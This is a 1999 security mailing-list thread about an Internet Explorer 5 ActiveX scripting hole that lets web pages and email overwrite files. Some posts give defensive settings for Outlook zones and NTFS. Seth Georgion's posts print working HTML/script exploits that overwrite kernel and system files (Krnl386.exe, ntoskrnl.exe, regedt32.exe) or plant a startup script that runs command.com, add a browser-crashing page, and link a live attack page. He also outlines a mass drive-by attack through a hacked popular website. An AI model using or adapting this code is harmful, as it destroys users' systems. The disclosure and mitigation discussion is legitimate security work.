Re: IE5 allows executing programs
A couple of people have sent me mail asking how to set Outlook 2000 such that mail comes in under the 'Restricted Sites' zone. Here's how: select Tools menu, Options item select security tab The area you want is in the middle of the page in the section marked 'Secure Content'. Default setting is 'Internet', which isn't too bad, but 'Restricted Sites' is better. One good reason for this is that most people don't have any sites in 'Restricted Sites' list, so anything you set in that zone won't screw up your normal web browsing. Another good reason is that the default security settings are better for this zone. Even with the 'High Security' settings, I like to go in and tweak the following: Script ActiveX Controls Marked Safe for Scripting - ActiveX seems to be disabled in other places, but go ahead and set this to prompt or disable just in case there is some exception I'm not aware of. Microsoft VM Java Permissions - the sandbox is set to high, but given that every Java VM out there has had a breach or another, and you don't know when the next will show up, I disable this. Who needs dancing bunnies in their e-mail anyway? Scripting, Active Scripting - I set this to disable. I haven't noticed any legitimate e-mail breaking, so I think these changes can be made without impacting anything you or your users might want. Please test this on your own before doing this to lots of machines. YMMV. The above is what I personally do, and may or may not reflect the views of my employer or anyone else. I'm reasonably sure that these settings disallow all of the e-mail attacks (attachments notwithstanding) that I'm aware of, so this should help make your system more secure against not only known attacks, but whole classes of undiscovered issues. I'm not sure what the variants of Outlook allow in this respect - I think the same thing was in Outlook 97, but I don't have it installed so I can't go check. Not sure about Outlook Express, and I don't know how Eudora 4.x works with this, either. David LeBlanc [EMAIL PROTECTED]
Re: IE5 allows executing programs
David LeBlanc writes: YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE. Period. End of story. What you do with that code is up to you. There is no need to delve into the details of just how you steal the lunch money from the end users. Well, it should be noted that there are things you can do with that code that are a lot worse than deleting all of somebody's files. Password theft, credit-card theft, wholesale identity theft, distributed computation (need to crack a DES message in a day?), embezzling money if they use CheckFree, blackmail, and corporate espionage come to mind. This sort of thing will happen, sooner or later, on a wide scale -- unless we can do something about it soon. The other thing is that the default install for NT (especially on HP's) is FAT, Wrong. That could be how that manufacturer sets up _some_ of their machines, but it isn't default for NT install. Micron and Intergraph also install NT on FAT when they ship it to you. Micron hassles you if you switch to NTFS and then call them for support; they wanted my co-worker to reinstall NT on FAT and then call them back if he was still having trouble. The NT install program gives you the option of FAT or NTFS; I don't remember which it picks by default. If I recall correctly (I've only installed NT five or six times), if you later convert to NTFS (without reinstalling), you carry over the FAT permissions: "Full Control" for "All Users" on everything. Most people who don't know what NTFS is are still using it if they are running NT. Are there manufacturers that ship NT with NTFS by default? -- [EMAIL PROTECTED] Kragen Sitaker http://www.pobox.com/~kragen/ Tue Aug 24 1999 76 days until the Internet stock bubble bursts on Monday, 1999-11-08. URL:http://www.pobox.com/~kragen/bubble.html
Re: IE5 allows executing programs
The other thing is that the default install for NT (especially on HP's) is FAT, Wrong. That could be how that manufacturer sets up _some_ of their machines, but it isn't default for NT install. Micron and Intergraph also install NT on FAT when they ship it to you. I can't think of many manufacturers that don't, and the majority of them don't like it if you convert it. Gateway, for example, refuses completely to support any aspect of NT running on NTFS on their systems. They even went so far as to try to void the warranty on one system we bought from them because it was running NTFS. The problem with this area, and what makes so many systems vulnerable, is that OEMs refuse to ship their systems with NTFS partitions. They won't do it because it is too difficult for them to walk someone through a repair if they can't get to the boot partition with a dos disk. Since most people don't know the difference between NTFS and FAT (or a hole in the ground for that matter) most partitions never get converted, leaving these systems open to holes like this one. This is a big problem. Hopefully, the ER boot option in Win2K will solve some of this, since it enables OEMs to easily walk people through repairs. If I recall correctly (I've only installed NT five or six times), if you later convert to NTFS (without reinstalling), you carry over the FAT permissions: "Full Control" for "All Users" on everything. FIXACLS.EXE (NTResKit Supplement 2) will fix that. See Q157963 for more details. Most people who don't know what NTFS is are still using it if they are running NT. Are there manufacturers that ship NT with NTFS by default? Only on servers AFAIK. Dell ships its workstations with a menu item for "converting C to NTFS," which is just a shortcut to convert. That's the best I've seen so far. Jesper M. Johansson [EMAIL PROTECTED] Editor, SANS NT Digest MCSE , MCP + I
Re: IE5 allows executing programs
Okay, I added a link to http://www.sassproductions.com/hacked.htm that allows you to test the exploit against a specific file. Specifically you need to copy Reg Edit to the program files folder and give it a whirl. As always, if you can't figure it out then View Source. Over and out, Seth Georgion
Re: IE5 allows executing programs
Does this writing to an EXE bypass Anti-Virus protection against programs that write to EXE's? How about a less damaging example that writes to say "C:\temp\example.exe" so we can see what it does safely? At 21:16 8/30/1999 -0400, SysAdmin Wrote: snip ANY Windows 98 file can be overwritten. Period. If you try and manually pasting over or destroying the file you will be denied, however Active X can help where you can't. In fact, ironically, after it's been corrupted you cannot fix it because you are denied from touching it! If Windows 98 is restarted or crashed (hint, forced to crash), then it will fail start up with a Fatal Exception, you can only recover from DOS by restoring the file. I would like to note, for the record, that the vast majority of home users who will never know about the patch to this file or know what Active X even is are not in possession of 98 install disks. Rather they are in possession of a disk that restores the computer to factory original. Despite David LeBlanc et al. assurance that we could just disable Active X I'm discussing it because you know your poor parents are NEVER going to, how would they understand the instructions? And, of course, what average user could EVER recover from this sort of damage? snip The link is http://www.sassproductions.com/hacked.htm snip Joshua MacCraw http://www.warpmedia.net mailto:[EMAIL PROTECTED]
Re: IE5 allows executing programs
Outlook Express 5 allows setting the Security Zones in the exact same way: Tools/Options/Security. So does Outlook 98. I don't think previous versions allowed it. --On 9/7/1999, 11:23 AM -0700 David LeBlanc [EMAIL PROTECTED] wrote: I'm not sure what the variants of Outlook allow in this respect - I think the same thing was in Outlook 97, but I don't have it installed so I can't go check. Not sure about Outlook Express, and I don't know how Eudora 4.x works with this, either. Paul L. Schmehl, [EMAIL PROTECTED] Technical Support Services Manager The University of Texas at Dallas
Re: IE5 allows executing programs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi all. I recently posted extracts from George Guninski's original post about this issue and an extract from Sysadmin's post (both with the code samples) in an e-mail to another list to inform some of 'the masses'. I received a personal e-mail from one of the people on that list describing the following: " I use Eudora Pro and have IE 5 as the default mail viewer (as is the default Install) and you crashed Eudora (NT not logged in as Administrator). I had to disable IE 5 as the default viewer to see the mail..." I assume this would have been caused by the mail reader attempting to execute all four fragments of code. Date sent: Wed, 1 Sep 1999 09:59:45 -0700 Send reply to: David LeBlanc [EMAIL PROTECTED] From: David LeBlanc [EMAIL PROTECTED] Subject: Re: IE5 allows executing programs Originally to: SysAdmin [EMAIL PROTECTED], [EMAIL PROTECTED] To: [EMAIL PROTECTED] Now for the detailed response... At 09:16 PM 8/30/99 -0400, SysAdmin wrote: ANY Windows 98 file can be overwritten. *snip* YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE. Period. End of story. What you do with that code is up to you. There is no need to delve into the details of just how you steal the lunch money from the end users. *even biggersnip* -BEGIN PGP SIGNATURE- Version: PGP 6.5.1 -- QDPGP 2.60 Comment: http://community.wow.net/grt/qdpgp.html iQA/AwUBN86VbgiK90dv14WBEQJ1ggCeOsY1DUXNIwKMaVgTOxHnMYSlg5gAoL1z Bns0JeGvBg6AOy5x3HkOIoO0 =IOcI -END PGP SIGNATURE- Brad Griffin 2nd yr B.Infotech CQU Rockhampton Australia (Translation: Does not require sleep) http://www.cai.com/antivirus/personal/ FREE anti-virus software http://www.avp.com Not free, but about the best around *
Re: IE5 allows executing programs
Onto Windows NT, yes, David was correct, you can bar write access in NTFS and it cannot be written to. I have not invested any interest in this but I assume there is at least one critical system file (possibly security file) that he would miss and might be overwritten. It's actually quite trivial to lock down an NT box against non-administrator system changes. The server variant can (or could -- I haven't installed it in awhile) optionally be set up that way out of the box -- but only if you chose the options right during installation. No application installers that I'm aware of have similar options, however, so you must manually secure anything you add. I wrote a simple tool that would tighten security on an NT system a few years ago as part of a foray into the NT security API -- it was not difficult at all. In fact, it was interesting to find out which files the system didn't like to have read-only: back in NT 3.5 the MS-DOS ROM file was written by CMD.EXE when it shut down! Very odd. I think they fixed that in NT4. In fact the default for the Administrator or one with Administrator privileges is Full Access. Yes. It never ceases to amaze me that Microsoft sets it up this way by default -- as well as not having any kind of tool in-the-box for tightening up security. It's a royal pain to do it manually. Perhaps even worse they appear to have no best-practices for secure application installations so even if they put this stuff in there it will be years before vendors start doing the right thing. The other thing to remember is that in very small domains the average user is generally administrator Even in domains of tens of machines (in my experience). NT is hugely problematic in that an awful lot of stuff can't be done unless you're an administrator -- and for sites that don't have enough administrator coverage (which seems to be most of them) it's common to just make everyone an administrator so they can perform typical system administration tasks themselves. The other thing is that the default install for NT (especially on HP's) is FAT, which does not allow specific file security. True, but conversion is just one command and a reboot away. So: I'll heartily agree with you that it's not hard to write an exploit that subverts your typical NT system, but we've seen very few to date (only one that I remember, but I haven't paid that much attention of late since I no longer use NT for anything critical) that can do so if you take a few simple precautions in setting up your system. jim
Re: IE5 allows executing programs
Now for the detailed response... At 09:16 PM 8/30/99 -0400, SysAdmin wrote: ANY Windows 98 file can be overwritten. Sure - the OS has no concept whatsoever of securing itself from the end user. DoSing Win98 with an attack like this is trivial. However, it is still a cheap, lame attack on end-users that really doesn't gain you anything and gives people a bad day. Maybe that's your idea of fun, but it isn't mine. May as well send them an executable that fdisks the hard drive. Probably work nearly as often, and do a lot more damage. Put dancing bunnies in the .exe. People love dancing bunnies. I would like to note, for the record, that the vast majority of home users For the record, this hole is a serious one. I don't downplay the seriousness of the issue. I can make it do a lot more than you're thinking about here, and a number of the obstacles you mention can be overcome trivially. YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE. Period. End of story. What you do with that code is up to you. There is no need to delve into the details of just how you steal the lunch money from the end users. Despite David LeBlanc et al. assurance that we could just disable Active X I'm discussing it because you know your poor parents are NEVER going to, Since this is a security list, people here care about security. One of the things we do here is discuss work-arounds. Most UNIX admins don't install patches either. Most _people_ don't install patches. I've broken into systems that had holes that were 10 years old. Maybe some of the people will read this, and say "Damn, he's right", then go click on several buttons and poof - they aren't vulnerable any more. Then if some sociopathic moron DOES go off and create an e-mail virus with this as the payload, maybe just maybe SOMEONE won't be hit by it. I try to offer helpful suggestions as to how to make things BETTER, given that between the fact that security holes happen, end users are usually clueless, and sysadmins aren't much better, most networks are a mess. The ONLY chance you've got against this sort of thing are automated tools to check LOTS of systems at once so that you know where the problems are. I deal with a network that approaches 100,000 systems, so I know something about scale. No, most people won't go turn it off. They'll accept the defaults, whatever they are. Somewhat more of them will read about this in the news and go get the patch. And, of course, what average user could EVER recover from this sort of damage? They'll go get a friend who will help them reinstall, or go pay CompUSA or something. They might not ever figure out what got them. Too bad you can't get them to take a snapshot using their web cam and send it to you so that you can see the misery on their face. Onto Windows NT, yes, David was correct, you can bar write access in NTFS and it cannot be written to. I have not invested any interest in this but I assume there is at least one critical system file (possibly security file) that he would miss and might be overwritten. Maybe you should. If you're not running as admin, there isn't much you can torch off, and certainly not the SAM file. In fact the default for the Administrator or one with Administrator privileges is Full Access. Of course this would allow the exploit to run. The other thing to remember is that in very small domains the average user is generally administrator This is true. Far too many people run as admin. Fortunately, this should get better in Win2k - several changes to encourage people to run as admin, and make life easier if you want to change user context to go do something. and remember this exploit can be E-Mailed!!! or mass-mailed! get my drift? I understand that. E-mail readers that display HTML aren't a really great idea in my personal opinion, and I'm not using one right now. However, I would encourage people to set their mail reader to assume that e-mail is a hostile site, and make the settings accordingly. Again, just a vain hope that maybe a few people might be more secure. IF someone takes my suggestion and tweaks their settings, there are whole classes of attacks that will no longer get them. And if you do mass mail something like that, you'll cost people a LOT of money, and the feds will make a good effort to hunt you down and put you in jail. Jail is not a fun place. The other thing is that the default install for NT (especially on HP's) is FAT, Wrong. That could be how that manufacturer sets up _some_ of their machines, but it isn't default for NT install. which does not allow specific file security. Anyone know a dual-booter? Maybe someone who doesn't even know what NTFS is? I thought so. Most people who don't know what NTFS is are still using it if they are running NT. Not bad 'huh? Actually, it contains flaws which are trivially overcome that make it break under a number of conditions. Though considering what this code does, not working could be
Re: IE5 allows executing programs
At 04:24 PM 8/29/99 -0400, SysAdmin wrote: Now watch as I modify this to destroy Regedit 32 That's only if the user has write permissions to regedt32. In terms of causing the OS to crash, NT won't let you overwrite system binaries that it is using at the moment. Something else smart to do (at least under win2k) is to use RunAs to run your browser under a lower privileged user than normal. snip really scary horror story - too bad Godzilla isn't in it Has anyone figure out if an arbitrary binary could be executed? George made that pretty clear. I'll leave the details as an exercise to the reader. Safest thing to do is get the patch and set your system to prompt you when something wants to script one of your ActiveX controls. The problem here isn't so much ActiveX (which is really just equivalent to a plug-in), but the fact that it can be scripted, and that the control itself is responsible for announcing whether it is safe for scripting. Also, I understand outlook executes this code immediatley, is it possible that this same code could cause someone's system to crash merely by opening the E-Mail? This depends on how you have Outlook set up. Outlook 2000 allows you to set your e-mail viewing zone to anything you like. Mine is set to Untrusted Zone, which has nearly everything set to either off or prompt. BTW, even default Untrusted Zone isn't untrusted enough for me, so a review of what the actual settings are is probably in order. I also like to set all sorts of stuff to 'prompt' so that it doesn't ignore potential attacks. Then I can take whatever action seems appropriate toward the site that is doing rude things 8-) Maybe it is just me, but DoS-ing end-users really seems about on par with beating up elementary school kids for their lunch money. David LeBlanc [EMAIL PROTECTED]
Re: IE5 allows executing programs
After further research into David LeBlanc's debunking of my posting I have
discovered (rather remembered) that ntoskrnl is loaded from the system
folder into memory where it is accessed exclusively, this frees it from the
write restriction due to system use. I think he must administrate Windows 98
domains which do not let you modify the Kernel (called Krnl386.exe) I'm
sorry I have taken so long to respond to the criticism but I felt that I,
unlike others, should do my research first. Let me summarize the current
understanding
ANY Windows 98 file can be overwritten. Period. If you try and manually
pasting over or destroying the file you will be denied, however Active X can
help where you can't. In fact, ironically, after it's been corrupted you
cannot fix it because you are denied from touching it! If Windows 98 is
restarted or crashed (hint, forced to crash), then it will fail start up
with a Fatal Exception, you can only recover from DOS by restoring the file.
I would like to note, for the record, that the vast majority of home users
who will never know about the patch to this file or know what Active X even
is are not in possession of 98 install disks. Rather they are in possession
of a disk that restores the computer to factory original. Despite David
LeBlanc et al. assurance that we could just disable Active X I'm discussing
it because you know your poor parents are NEVER going to, how would they
understand the instructions? And, of course, what average user could EVER
recover from this sort of damage?
Onto Windows NT, yes, David was correct, you can bar write access in NTFS
and it cannot be written to. I have not invested any interest in this but I
assume there is at least one critical system file (possibly security file)
that he would miss and might be overwritten. In fact the default for the
Administrator or one with Administrator privileges is Full Access. Of course
this would allow the exploit to run. The other thing to remember is that in
very small domains the average user is generally administrator and remember
this exploit can be E-Mailed!!! or mass-mailed! get my drift? The other
thing is that the default install for NT (especially on HP's) is FAT, which
does not allow specific file security. Anyone know a dual-booter? Maybe
someone who doesn't even know what NTFS is? I thought so.
Well, I must admit I'm tired of the down playing and guessing. I have
decided to put the ball in play. I have posted a web page, on my domain mind
you, that contains the Hacks for both OS's. Understand that if you visit
them the hack will run and when it runs, if you're not prepared, you will be
very unhappy. I have included the code here so that you can see what
happens.
The link is http://www.sassproductions.com/hacked.htm
The code for the 98 exploit is
p
object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
/objectscript
scr.Reset();
scr.Path="C:\\windows\\system\\Krnl386.exe";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script
/p
See how simply that was adapted? I polished it not-at-all so you can see the
minimal changes. At this point you would be automatically transferred to a
second web page that would contain the following code.
html
head
titleSelf Destruct /title
/head
body
form method="POST"
table
tr
td width="20%"input type="text" name="State" size=""
maxlength="" value=""/td
/tr
/table
/form
/body
/html
Recognize that? It's the code to DoS IE5. Most simple users would restart at
this point, never notice a web page change, and lose their Kernel.
Here's the NT code
p
object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14"
/object
script
scr.Reset();
scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script
/p
Not bad 'huh? This exploit needs to be realized for what it is, a very
dangerous problem. If someone mass-mailed it to my domain I wouldn't be able
to deal with bouncing between three offices helping EVERY single user.
If someone has a problem with my post feel free to mention it.
Seth Georgion
Re: IE5 allows executing programs
Okay, I haven't seen any interesting observations yet as to the value of
this exploit or the potential damage it contains. This exploit allows for
the OVERWRITING of any application you choose, WITHOUT the system objecting.
I haven't tested it against anything specific yet, except for a trial run
against Regedit. The key is to select a specific path in which a known file
resides, such as C:\\winnt\system32 and then you give the .hta file the name
of the file you want overwritten. Here's the code originally included;
object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
/object
SCRIPT
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Written by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/SCRIPT
/object
If you wanted this to run against an NT machine then,
object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
/objectscript
scr.Reset();
scr.Path="C:\\WINNT\\Profiles\\All Users\\Start
Menu\\Programs\\Startup\\guninski.hta";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script
For all those arguing about figuring out which user it should be addressed
to, the answer is to "All Users"
Now watch as I modify this to destroy Regedit 32
object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
/objectscript
scr.Reset();
scr.Path="C:\\WINNT\\System32\\regedt32.exe";
scr.Doc="object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectSCRIPTalert(
'Screw Denise Richards, Debbie Johnson
r0x!');wsh.Run('c:\\command.com');/"+"SCRIPT";
scr.write();
/script
As you can see the simple malicious damage is unprecedented, good luck
trying to figure out what's happened when your computers crashed,
permanently. Now let me give you a simple scenario for a real-world example.
Let's say a Cracker, we'll call him Ahab, decides to take over ABC or
Symantec's web page, not that difficult to imagine. Without ever breaking
the firewall, all he has to do is modify the web page. Now usually they
detect the obscene message within minutes taking it offline, imagine though
if Ahab just modified the source, he could include in it both Active X
exploits, for NT and 98, in addition he could add to the source an
insturction to change to another web page in 5 seconds, a page he's added to
InetPub. This new page would include the even more recent exploit that
crashes IE5 with a form field overflow. Imagine how long it would take for
anyone to realize that the web page had been hacked, their computers would
freeze everytime they went there for no apparent reason (the new exploit
doesn't display the page that froze your browser only the page before) All
of those home users, the thousands of hits a day they'd be getting, would
simply connect to the site, get their system Kernal overwritten and have
their browser crashed, forcing a restart for the home user. Does everyone
see the potential damage here?
Has anyone figure out if an arbitrary binary could be executed? Such as Net
Cat or BO2K? Also, I understand outlook executes this code immediatley, is
it possible that this same code could cause someone's system to crash merely
by opening the E-Mail?
Seth Georgion
